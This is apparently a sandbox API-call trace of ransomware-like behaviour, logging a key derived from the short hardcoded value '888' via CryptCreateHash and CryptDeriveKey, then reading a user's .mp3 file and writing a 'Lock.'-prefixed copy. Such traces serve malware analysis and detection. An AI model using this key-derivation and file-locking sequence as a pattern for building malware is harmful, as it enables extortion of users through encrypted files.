WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0206.084] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aaab70, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0206.084] CryptCreateHash (in: hProv=0xa7c7f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0206.084] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0206.084] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71b88, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0206.084] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0206.084] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0206.084] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71b68, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0206.084] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0206.084] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0206.084] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0206.084] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0206.085] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aaadc8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0206.085] CryptHashData (hHash=0x9e1bf8, pbData=0x2a719b8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0206.085] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0206.085] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0206.085] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0206.085] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0206.085] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0206.085] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0206.085] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aab0c8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0206.085] CryptDeriveKey (in: hProv=0xa7c7f8, Algid=0x6601, hBaseData=0x9e1bf8, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9e2078) returned 1 [0206.085] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0206.085] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0206.085] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0206.085] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0206.085] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f7180, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0206.085] CryptDestroyHash (hHash=0x9e1bf8) returned 1 [0206.086] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\JlLewkGtdwovoI.mp3" (normalized: "c:\\users\\fd1hvy\\music\\jllewkgtdwovoi.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4ac [0206.086] SetFilePointerEx (in: hFile=0x4ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0206.086] SetFilePointerEx (in: hFile=0x4ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0206.086] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6f60 [0206.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab28 | out: hHeap=0x2af0000) returned 1 [0206.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0206.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaaf8 | out: hHeap=0x2af0000) returned 1 [0206.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa948 | out: hHeap=0x2af0000) returned 1 [0206.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0206.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8e8 | out: hHeap=0x2af0000) returned 1 [0206.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0206.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa50 | out: hHeap=0x2af0000) returned 1 [0206.087] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0206.088] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0206.088] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0206.088] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0206.088] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0206.088] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0206.088] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0206.088] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0206.088] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0206.088] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8e8 [0206.088] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b18 [0206.088] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0206.088] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0206.088] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa900 [0206.088] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b18 [0206.089] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa50 [0206.089] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa930 [0206.089] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730a8 [0206.089] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa98 [0206.089] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0206.089] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa98 | out: hHeap=0x2af0000) returned 1 [0206.089] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa930 | out: hHeap=0x2af0000) returned 1 [0206.089] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa50 | out: hHeap=0x2af0000) returned 1 [0206.089] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0206.089] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa888 [0206.089] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b18 [0206.089] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x60) returned 0x2a74c58 [0206.089] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa888 | out: hHeap=0x2af0000) returned 1 [0206.089] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music/" (normalized: "c:\\users\\fd1hvy\\music")) returned 0x11 [0206.089] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74c58 | out: hHeap=0x2af0000) returned 1 [0206.089] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0206.089] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed00 [0206.089] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2a8a138 [0206.089] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa50 [0206.089] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b18 [0206.089] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music/Lock.JlLewkGtdwovoI.mp3" (normalized: "c:\\users\\fd1hvy\\music\\lock.jllewkgtdwovoi.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x50c [0206.090] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7140 [0206.090] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0206.090] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8e8 | out: hHeap=0x2af0000) returned 1 [0206.090] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa900 | out: hHeap=0x2af0000) returned 1 [0206.090] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0206.090] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0206.090] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8b8 | out: hHeap=0x2af0000) returned 1 [0206.090] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0206.090] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa08 | out: hHeap=0x2af0000) returned 1 [0206.090] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0206.090] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0206.090] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0206.090] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e700 [0206.090] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0206.090] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e700 | out: hHeap=0x2af0000) returned 1 [0206.090] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0206.090] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0206.090] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0206.091] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0206.091] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaaf8 [0206.091] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8b8 [0206.091] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0206.091] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0206.091] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa98 [0206.091] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0206.091] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaab0 [0206.091] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8e8 [0206.091] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730a8 [0206.091] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaac8 [0206.091] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0206.091] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaac8 | out: hHeap=0x2af0000) returned 1 [0206.091] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8e8 | out: hHeap=0x2af0000) returned 1 [0206.091] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaab0 | out: hHeap=0x2af0000) returned 1 [0206.091] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730a8 [0206.091] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70e0 [0206.091] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa888 [0206.091] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaab0 [0206.091] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73128 [0206.091] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8e8 [0206.091] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0206.091] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8e8 | out: hHeap=0x2af0000) returned 1 [0206.091] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaab0 | out: hHeap=0x2af0000) returned 1 [0206.091] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa888 | out: hHeap=0x2af0000) returned 1 [0206.092] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70e0 | out: hHeap=0x2af0000) returned 1 [0206.092] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0206.092] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0206.092] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0206.092] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0206.092] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b08 [0206.092] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x100000) returned 0x50e2020 [0206.094] SetFilePointerEx (in: hFile=0x4ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0206.094] ReadFile (in: hFile=0x4ac, lpBuffer=0x2a7a130, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2a7a130*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0206.097] ReadFile (in: hFile=0x4ac, lpBuffer=0x2a7a130, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2a7a130*, lpNumberOfBytesRead=0x8cf4f8*=0xc08, lpOverlapped=0x0) returned 1 [0206.097] ReadFile (in: hFile=0x4ac, lpBuffer=0x2a7a130, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2a7a130*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0206.097] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0206.097] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0206.097] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0206.097] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0206.097] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10c08) returned 0x2aae878 [0206.099] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x50e2020 | out: hHeap=0x2af0000) returned 1 [0206.101] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8b8 | out: hHeap=0x2af0000) returned 1 [0206.101] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa98 | out: hHeap=0x2af0000) returned 1 [0206.101] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaaf8 | out: hHeap=0x2af0000) returned 1 [0206.101] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0206.101] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0206.101] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0206.102] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaae0 | out: hHeap=0x2af0000) returned 1 [0206.102] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b28 [0206.102] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10c08) returned 0x2abf488 [0206.103] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aae878 | out: hHeap=0x2af0000) returned 1 [0206.103] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0206.103] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0206.103] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0206.103] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0206.103] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0206.103] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0206.103] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73128 [0206.103] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10c08) returned 0x2aae878 [0206.103] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0206.103] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aae878 | out: hHeap=0x2af0000) returned 1 [0206.104] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0206.104] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0206.104] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0206.104] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0206.104] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0206.104] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0206.104] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0206.105] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7200 [0206.105] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7200 | out: hHeap=0x2af0000) returned 1 [0206.105] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0206.105] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0206.105] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ecc0 [0206.105] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0206.105] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0206.105] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0206.105] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a58 [0206.105] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0206.105] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fd0 | out: hHeap=0x2af0000) returned 1 [0206.105] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0206.105] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0206.105] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72a58 [0206.105] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa888 [0206.105] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa98 [0206.105] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730a8 [0206.105] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73128 [0206.105] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10c08) returned 0x2aae878 [0206.107] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0206.107] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a730a8 [0206.107] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8b8 [0206.107] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a716e8 [0206.107] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0206.107] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a716e8 [0206.107] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa870 [0206.107] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a715e8 [0206.107] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0206.107] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71718 [0206.107] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0206.107] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a715e8 [0206.107] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0206.107] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaac8 [0206.107] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0206.107] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0206.107] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a715e8 [0206.107] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0206.107] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0206.107] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaab0 [0206.107] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0206.107] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10c08) returned 0x37c0048 [0206.109] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0206.109] 